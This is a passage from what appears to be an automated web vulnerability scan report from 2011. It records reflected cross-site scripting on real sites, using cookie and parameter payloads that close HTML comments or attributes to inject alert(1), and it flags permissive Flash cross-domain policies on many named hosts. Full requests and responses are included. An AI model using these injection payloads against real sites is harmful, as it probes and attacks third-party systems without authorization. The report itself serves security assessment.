Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET / HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/General-Website-Tools/Send-ACH-through-CCBill-l13.html
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.5.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1; cookiePageWidth=920px430a3--><script>alert(1)</script>a94cfc1175f; cookieLetterSize=1em; box_content_20=block; box_content_21=block; box_content_6=block; box_content_22=block; first=foo

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:04:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Drectory-Script: eSyndiCat Pro v2.3.02
Content-Type: text/html; charset=utf-8
Content-Length: 19445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<div class="page" style=" width: 920px430a3--><script>alert(1)</script>a94cfc1175f; font-size: 1em;">
...[SNIP]...

3.32. http://apps.ccbill.com/General-Website-Tools/Send-ACH-through-CCBill-l13.html [cookieLetterSize cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apps.ccbill.com
Path:   /General-Website-Tools/Send-ACH-through-CCBill-l13.html

Issue detail

The value of the cookieLetterSize cookie is copied into an HTML comment. The payload e4d2a--><script>alert(1)</script>9c83aba8dd1 was submitted in the cookieLetterSize cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /General-Website-Tools/Send-ACH-through-CCBill-l13.html HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.4.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1; cookiePageWidth=920px; cookieLetterSize=1eme4d2a--><script>alert(1)</script>9c83aba8dd1; box_content_20=block; box_content_21=block; box_content_6=block; box_content_22=block; first=foo

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:02:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Drectory-Script: eSyndiCat Pro v2.3.02
Content-Type: text/html; charset=utf-8
Content-Length: 20488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<div class="page" style=" width: 920px; font-size: 1eme4d2a--><script>alert(1)</script>9c83aba8dd1;">
...[SNIP]...

3.33. http://apps.ccbill.com/General-Website-Tools/Send-ACH-through-CCBill-l13.html [cookiePageWidth cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apps.ccbill.com
Path:   /General-Website-Tools/Send-ACH-through-CCBill-l13.html

Issue detail

The value of the cookiePageWidth cookie is copied into an HTML comment. The payload 7d056--><script>alert(1)</script>975a7e1977 was submitted in the cookiePageWidth cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /General-Website-Tools/Send-ACH-through-CCBill-l13.html HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.4.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1; cookiePageWidth=920px7d056--><script>alert(1)</script>975a7e1977; cookieLetterSize=1em; box_content_20=block; box_content_21=block; box_content_6=block; box_content_22=block; first=foo

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:02:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Drectory-Script: eSyndiCat Pro v2.3.02
Content-Type: text/html; charset=utf-8
Content-Length: 20432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<div class="page" style=" width: 920px7d056--><script>alert(1)</script>975a7e1977; font-size: 1em;">
...[SNIP]...

3.34. http://apps.ccbill.com/p/developer.html [cookieLetterSize cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apps.ccbill.com
Path:   /p/developer.html

Issue detail

The value of the cookieLetterSize cookie is copied into an HTML comment. The payload 87721--><script>alert(1)</script>11f81e5e53 was submitted in the cookieLetterSize cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /p/developer.html HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.6.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1; cookiePageWidth=920px; cookieLetterSize=1em87721--><script>alert(1)</script>11f81e5e53; box_content_20=block; box_content_21=block; box_content_6=block; box_content_22=block; first=foo

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:04:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Drectory-Script: eSyndiCat Pro v2.3.02
Content-Type: text/html; charset=utf-8
Content-Length: 25519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<div class="page" style=" width: 920px; font-size: 1em87721--><script>alert(1)</script>11f81e5e53;">
...[SNIP]...

3.35. http://apps.ccbill.com/p/developer.html [cookiePageWidth cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apps.ccbill.com
Path:   /p/developer.html

Issue detail

The value of the cookiePageWidth cookie is copied into an HTML comment. The payload fc14d--><script>alert(1)</script>c14f5eaa013 was submitted in the cookiePageWidth cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /p/developer.html HTTP/1.1
Host: apps.ccbill.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://apps.ccbill.com/
Cookie: __utma=250776793.716836192.1310490057.1310490057.1310490057.1; __utmb=250776793.6.10.1310490057; __utmc=250776793; __utmz=250776793.1310490057.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __kti=1310490058054,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __kts=1310490058057,http%3A%2F%2Fwww.ccbill.com%2F,http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue; __ktv=1b20-38-480-dd841311f4b5d4c; __ktt=d411-90b5-b8ff-5d151311f4b5d4c; PHPSESSID=6nflcqbla83qcbamgrdcq2p1n1; cookiePageWidth=920pxfc14d--><script>alert(1)</script>c14f5eaa013; cookieLetterSize=1em; box_content_20=block; box_content_21=block; box_content_6=block; box_content_22=block; first=foo

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:04:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Drectory-Script: eSyndiCat Pro v2.3.02
Content-Type: text/html; charset=utf-8
Content-Length: 25497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<div class="page" style=" width: 920pxfc14d--><script>alert(1)</script>c14f5eaa013; font-size: 1em;">
...[SNIP]...

3.36. http://www.jpmorganaccess.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpmorganaccess.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0db0"><script>alert(1)</script>671079c1d94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?f0db0"><script>alert(1)</script>671079c1d94=1 HTTP/1.1
Host: www.jpmorganaccess.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 302 This object has moved
Content-type: text/html
Content-Length: 257
Location: https://tssportal.jpmorgan.com/?f0db0"><script>alert(1)</script>671079c1d94=1

<html><head><title>302 - This object has moved</title></head>
<body>
<h1>302: This object has moved</h1>
<b><p>Please click <A HREF="https://tssportal.jpmorgan.com/?f0db0"><script>alert(1)</script>671079c1d94=1">
...[SNIP]...

4. Flash cross-domain policy  previous  next
There are 18 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://1.gravatar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://1.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 1.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/xml
Date: Tue, 12 Jul 2011 20:47:03 GMT
Expires: Tue, 12 Jul 2011 20:52:03 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: ECS (dca/532A)
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.2. http://at.amgdgt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.amgdgt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: at.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:39:31 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 21 May 2010 08:32:40 GMT
ETag: "308cb3d-12e-4871688bd9a00"
Accept-Ranges: bytes
Content-Length: 302
Cache-Control: max-age=21600
Expires: Wed, 13 Jul 2011 02:39:31 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="all" />
...[SNIP]...

4.3. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Wed, 13 Jul 2011 20:46:59 GMT
Date: Tue, 12 Jul 2011 20:46:59 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

4.4. http://bh.contextweb.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.contextweb.com

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
ETag: W/"384-1279190951000"
Last-Modified: Thu, 15 Jul 2010 10:49:11 GMT
Content-Type: application/xml
Content-Length: 384
Date: Tue, 12 Jul 2011 21:30:50 GMT
Connection: Keep-Alive
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.contxtweb.com -->
<cross-domain-policy>
<site-contro
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.5. http://idcs.interclick.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 23 Jun 2011 03:34:28 GMT
Accept-Ranges: bytes
ETag: "f5f224755631cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Tue, 12 Jul 2011 20:39:30 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.6. http://metrics.apple.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.apple.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.apple.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:59:12 GMT
Server: Omniture DC/2.0.0
xserver: www46
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.7. http://mtrcs.popcap.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mtrcs.popcap.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: mtrcs.popcap.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:39:19 GMT
Server: Omniture DC/2.0.0
xserver: www378
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.8. http://pixel.mathtag.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
Etag: 4dd07bc8-e97b-118c-3dec-7b8c5c306530
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x1 pid 0x1b3b 6971
Set-Cookie: ts=1310503212; domain=.mathtag.com; path=/; expires=Wed, 11-Jul-2012 20:40:12 GMT
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

4.9. http://s.gravatar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Tue, 12 Jul 2011 20:47:00 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: nginx
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.10. http://stats.adobe.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stats.adobe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: stats.adobe.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:40:24 GMT
Server: Omniture DC/2.0.0
xserver: www1
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.11. http://www.burstnet.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.burstnet.com

Response

HTTP/1.0 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Last-Modified: Wed, 11 May 2011 13:13:45 GMT
ETag: "110080-66-4dca8b89"
Accept-Ranges: bytes
Content-Length: 102
Content-Type: text/xml
Date: Tue, 12 Jul 2011 20:39:27 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.12. http://www.gravatar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gravatar.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 12 Jul 2011 20:47:13 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Accept-Ranges: bytes
Content-Length: 261

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.13. http://www7.lowes.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www7.lowes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www7.lowes.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 21:30:49 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "13dd40-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=972
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.14. http://blogs.adobe.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://blogs.adobe.com
